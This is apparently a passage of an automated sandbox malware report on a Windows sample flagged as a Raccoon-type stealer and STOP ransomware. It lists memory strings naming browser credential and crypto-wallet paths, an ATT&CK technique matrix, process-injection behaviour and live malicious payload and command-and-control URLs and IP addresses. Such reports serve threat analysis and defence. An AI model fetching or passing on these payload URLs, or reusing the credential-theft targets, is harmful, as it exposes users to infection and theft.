                    Source: Yara matchFile source: 20.2.28E9.exe.4d2d13.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.28E9.exe.4d2d13.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000014.00000002.418605685.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.397574395.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.390943564.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.381054499.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.389798020.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.393288664.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.392382222.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.392760515.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.372026419.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.391797560.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: E69F.exe PID: 1436, type: MEMORYSTR
                    Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_electrum:Electrum;26;Electrum\wallets;*;-
                    Source: E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wlts_elecbch:ElectronCash;26;ElectronCash\wallets;*;-
                    Source: E69F.exe, 00000023.00000002.584376569.00000000005AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets\*9
                    Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\*UD
                    Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\*?C
                    Source: 28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\exodus\*?C
                    Source: E69F.exe, 00000023.00000002.584376569.00000000005AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\*
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0000001F.00000002.502148462.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.596787162.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.20.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.20.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.28E9.exe.4d2d13.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.2.28E9.exe.4d2d13.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000014.00000002.418605685.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.397574395.00000000004CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.390943564.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.381054499.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.389798020.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.393288664.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.392382222.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.392760515.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.372026419.00000000004D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000003.391797560.00000000004CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: E69F.exe PID: 1436, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts2
                    Native API
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium14
                    Ingress Tool Transfer
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Shared Modules
                    1
                    Registry Run Keys / Startup Folder
                    612
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth22
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts1
                    Exploitation for Client Execution
                    1
                    Services File Permissions Weakness
                    1
                    Registry Run Keys / Startup Folder
                    2
                    Obfuscated Files or Information
                    Security Account Manager3
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Input Capture
                    Automated Exfiltration4
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local Accounts2
                    Command and Scripting Interpreter
                    Logon Script (Mac)1
                    Services File Permissions Weakness
                    22
                    Software Packing
                    NTDS34
                    System Information Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer125
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets1
                    Query Registry
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common1
                    File Deletion
                    Cached Domain Credentials411
                    Security Software Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                    Masquerading
                    DCSync12
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job12
                    Virtualization/Sandbox Evasion
                    Proc Filesystem13
                    Process Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)612
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                    Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                    Hidden Files and Directories
                    Network Sniffing1
                    System Owner/User Discovery
                    Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                    Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                    Regsvr32
                    Input Capture1
                    Remote System Discovery
                    Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                    Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                    Services File Permissions Weakness
                    KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 682150 Sample: 5tLwjRFzAW.exe Startdate: 11/08/2022 Architecture: WINDOWS Score: 100 70 linislominyt11.at 2->70 72 acacaca.org 2->72 74 2 other IPs or domains 2->74 80 Snort IDS alert for network traffic 2->80 82 Multi AV Scanner detection for domain / URL 2->82 84 Malicious sample detected (through community Yara rule) 2->84 86 11 other signatures 2->86 10 5tLwjRFzAW.exe 2->10         started        13 irbiwat 2->13         started        15 A658.exe 2->15         started        signatures3 process4 signatures5 118 Detected unpacking (changes PE section rights) 10->118 120 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 10->120 122 Maps a DLL or memory area into another process 10->122 17 explorer.exe 5 10->17 injected 124 Machine Learning detection for dropped file 13->124 126 Checks if the current machine is a virtual machine (disk enumeration) 13->126 128 Creates a thread in another existing process (thread injection) 13->128 process6 dnsIp7 62 linislominyt11.at 110.14.121.125, 49754, 49758, 49793 SKB-ASSKBroadbandCoLtdKR Korea Republic of 17->62 64 acacaca.org 175.120.254.9, 49755, 49760, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 17->64 66 12 other IPs or domains 17->66 44 C:\Users\user\AppData\Roaming\irbiwat, PE32 17->44 dropped 46 C:\Users\user\AppData\Local\Temp69F.exe, PE32 17->46 dropped 48 C:\Users\user\AppData\Local\Temp\D0E3.dll, PE32 17->48 dropped 50 4 other malicious files 17->50 dropped 88 System process connects to network (likely due to code injection or exploit) 17->88 90 Benign windows process drops PE files 17->90 92 Deletes itself after installation 17->92 94 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->94 22 28E9.exe 25 17->22         started        27 A658.exe 17->27         started        29 33.exe 17->29         started        31 2 other processes 17->31 file8 signatures9 process10 dnsIp11 76 45.138.74.104, 49759, 80 HOSTGLOBALPLUS-ASRU Russian Federation 22->76 54 C:\Users\user\AppData\...\vcruntime140.dll, PE32 22->54 dropped 56 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 22->56 dropped 58 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 22->58 dropped 60 4 other files (none is malicious) 22->60 dropped 100 Multi AV Scanner detection for dropped file 22->100 102 Detected unpacking (changes PE section rights) 22->102 104 Detected unpacking (overwrites its own PE header) 22->104 116 2 other signatures 22->116 106 Machine Learning detection for dropped file 27->106 108 Contains functionality to inject code into remote processes 27->108 110 Injects a PE file into a foreign processes 27->110 33 A658.exe 1 16 27->33         started        112 Sample uses process hollowing technique 29->112 78 193.56.146.177, 49812, 80 LVLT-10753US unknown 31->78 114 Antivirus detection for dropped file 31->114 37 regsvr32.exe 31->37         started        file12 signatures13 process14 dnsIp15 68 api.2ip.ua 162.0.217.254, 443, 49804, 49814 ACPCA Canada 33->68 52 C:\Users\user\AppData\Local\...\A658.exe, PE32 33->52 dropped 39 A658.exe 33->39         started        42 icacls.exe 33->42         started        file16 process17 signatures18 96 Sample uses process hollowing technique 39->96 98 Injects a PE file into a foreign processes 39->98

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    5tLwjRFzAW.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\E69F.exe100%AviraTR/AD.RaccoonSteal.muash
                    C:\Users\user\AppData\Local\Temp\D0E3.dll100%AviraHEUR/AGEN.1233360
                    C:\Users\user\AppData\Local\Temp\28E9.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\irbiwat100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\A658.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\Temp\D0E3.dll100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\b4d5ea9d-82ae-4ef5-85ba-00d479d46415\A658.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\LocalLow\freebl3.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\freebl3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\mozglue.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\mozglue.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\msvcp140.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\msvcp140.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\nss3.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\nss3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\softokn3.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\softokn3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                    C:\Users\user\AppData\LocalLow\vcruntime140.dll0%MetadefenderBrowse
                    C:\Users\user\AppData\LocalLow\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\28E9.exe81%ReversingLabsWin32.Ransomware.Stop
                    C:\Users\user\AppData\Local\Temp\33.exe21%MetadefenderBrowse
                    C:\Users\user\AppData\Local\Temp\33.exe22%ReversingLabsWin32.Trojan.Zusy
                    C:\Users\user\AppData\Local\Temp\A658.exe47%MetadefenderBrowse
                    C:\Users\user\AppData\Local\Temp\A658.exe56%ReversingLabsWin32.Ransomware.StopCrypt
                    SourceDetectionScannerLabelLinkDownload
                    31.2.regsvr32.exe.4df0000.2.unpack100%AviraHEUR/AGEN.1215461Download File
                    40.3.33.exe.1240000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    17.2.irbiwat.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.5tLwjRFzAW.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    31.2.regsvr32.exe.400000.0.unpack100%AviraHEUR/AGEN.1232827Download File
                    17.2.irbiwat.40e0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    0.2.5tLwjRFzAW.exe.2680e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    31.2.regsvr32.exe.4f10000.3.unpack100%AviraHEUR/AGEN.1249928Download File
                    20.2.28E9.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    17.3.irbiwat.40f0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    28.2.A658.exe.400000.0.unpack100%AviraHEUR/AGEN.1223627Download File
                    0.3.5tLwjRFzAW.exe.2690000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    31.2.regsvr32.exe.4cd0184.1.unpack100%AviraTR/Kazy.4159236Download File
                    40.2.33.exe.b9f8d0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                    SourceDetectionScannerLabelLink
                    monsutiur4.com18%VirustotalBrowse
                    rgyui.top22%VirustotalBrowse
                    linislominyt11.at16%VirustotalBrowse
                    acacaca.org18%VirustotalBrowse
                    moroitomo4.net15%VirustotalBrowse
                    cucumbetuturel4.com16%VirustotalBrowse
                    SourceDetectionScannerLabelLink
                    http://193.56.146.177/M0%Avira URL Cloudsafe
                    http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1wD0%Avira URL Cloudsafe
                    http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02.0%Avira URL Cloudsafe
                    http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02PowerShell0%Avira URL Cloudsafe
                    http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02&0%Avira URL Cloudsafe
                    http://www.opera.com00%Avira URL Cloudsafe
                    http://limo00ruling.org/100%URL Reputationmalware
                    http://acacaca.org/lancer/get.php100%Avira URL Cloudmalware
                    http://45.138.74.104/0%Avira URL Cloudsafe
                    http://85.192.63.46/f/1.exe100%Avira URL Cloudmalware
                    http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f020%Avira URL Cloudsafe
                    http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb10%Avira URL Cloudsafe
                    http://lilisjjoer44.com/0%URL Reputationsafe
                    http://susuerulianita1.net/100%URL Reputationmalware
                    http://linislominyt11.at/100%URL Reputationmalware
                    http://mini55tunul.com/0%URL Reputationsafe
                    http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1xD0%Avira URL Cloudsafe
                    http://62.204.41.178/newfile.exe100%Avira URL Cloudmalware
                    http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                    http://193.56.146.177/0%Avira URL Cloudsafe
                    http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1$D0%Avira URL Cloudsafe
                    https://mozilla.org00%URL Reputationsafe
                    http://nikogminut88.at/100%URL Reputationmalware
                    http://acacaca.org/lancer/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C100%Avira URL Cloudmalware
                    http://cucumbetuturel4.com/0%URL Reputationsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    monsutiur4.com
                    185.237.206.60
                    truetrueunknown
                    rgyui.top
                    190.140.74.43
                    truefalseunknown
                    api.2ip.ua
                    162.0.217.254
                    truefalse
                      high
                      linislominyt11.at
                      110.14.121.125
                      truetrueunknown
                      acacaca.org
                      175.120.254.9
                      truetrueunknown
                      moroitomo4.net
                      unknown
                      unknowntrueunknown
                      cucumbetuturel4.com
                      unknown
                      unknowntrueunknown
                      nusurionuy5ff.at
                      unknown
                      unknowntrue
                        unknown
                        susuerulianita1.net
                        unknown
                        unknowntrue
                          unknown
                          nunuslushau.com
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            http://limo00ruling.org/true
                            • URL Reputation: malware
                            unknown
                            http://acacaca.org/lancer/get.phptrue
                            • Avira URL Cloud: malware
                            unknown
                            http://45.138.74.104/true
                            • Avira URL Cloud: safe
                            unknown
                            http://85.192.63.46/f/1.exetrue
                            • Avira URL Cloud: malware
                            unknown
                            http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02false
                            • Avira URL Cloud: safe
                            unknown
                            http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1true
                            • Avira URL Cloud: safe
                            unknown
                            http://lilisjjoer44.com/true
                            • URL Reputation: safe
                            unknown
                            http://susuerulianita1.net/true
                            • URL Reputation: malware
                            unknown
                            http://linislominyt11.at/true
                            • URL Reputation: malware
                            unknown
                            http://mini55tunul.com/true
                            • URL Reputation: safe
                            unknown
                            http://62.204.41.178/newfile.exetrue
                            • Avira URL Cloud: malware
                            unknown
                            http://193.56.146.177/false
                            • Avira URL Cloud: safe
                            unknown
                            http://nikogminut88.at/true
                            • URL Reputation: malware
                            unknown
                            http://acacaca.org/lancer/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806Ctrue
                            • Avira URL Cloud: malware
                            unknown
                            http://cucumbetuturel4.com/true
                            • URL Reputation: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.2ip.ua/-JA658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/chrome_newtab28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drfalse
                                high
                                http://www.mozilla.com/en-US/blocklist/mozglue.dll.20.drfalse
                                  high
                                  http://193.56.146.177/ME69F.exe, 00000023.00000003.478816889.000000000054A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://duckduckgo.com/ac/?q=28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drfalse
                                    high
                                    http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1wD28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://api.2ip.ua/A658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.ico28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drfalse
                                        high
                                        http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02.E69F.exe, 00000023.00000002.576521462.000000000056B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02PowerShellE69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://193.56.146.177/e2f032260ba0b2ece29cbd952d3f7f02&E69F.exe, 00000023.00000002.576521462.000000000056B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.opera.com033.exe.4.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drfalse
                                          high
                                          https://support.google.com/chrome/?p=plugin_flash28E9.exe, 00000014.00000003.393400015.000000000052C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://api.2ip.ua/geo.jsonnA658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drfalse
                                                high
                                                https://api.2ip.ua/geo.jsonA658.exe, A658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.460852249.000000000087C000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.459744323.00000000008AE000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.openssl.org/support/faq.htmlA658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmpfalse
                                                    high
                                                    https://ac.ecosia.org/autocomplete?q=28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drfalse
                                                      high
                                                      http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1xD28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorA658.exe, 0000001B.00000002.458620558.0000000002340000.00000040.00001000.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      low
                                                      http://45.138.74.104/8d5bc04a8dfb506a455ebe83e0e99bb1$D28E9.exe, 00000014.00000002.419440478.0000000000571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drfalse
                                                        high
                                                        https://mozilla.org0softokn3.dll.20.dr, nss3.dll.20.dr, mozglue.dll.20.dr, freebl3.dll.20.drfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.sqlite.org/copyright.html.sqlite3.dll.20.drfalse
                                                          high
                                                          https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=28E9.exe, 00000014.00000003.397412783.000000000053F000.00000004.00000020.00020000.00000000.sdmp, 8EK4CZ3qdU65.20.dr, y79VUKJAS8XH.20.drfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            211.59.14.90
                                                            unknownKorea Republic of
                                                            9318SKB-ASSKBroadbandCoLtdKRfalse
                                                            185.237.206.60
                                                            monsutiur4.comUkraine
                                                            21100ITLDC-NLUAtrue
                                                            110.14.121.125
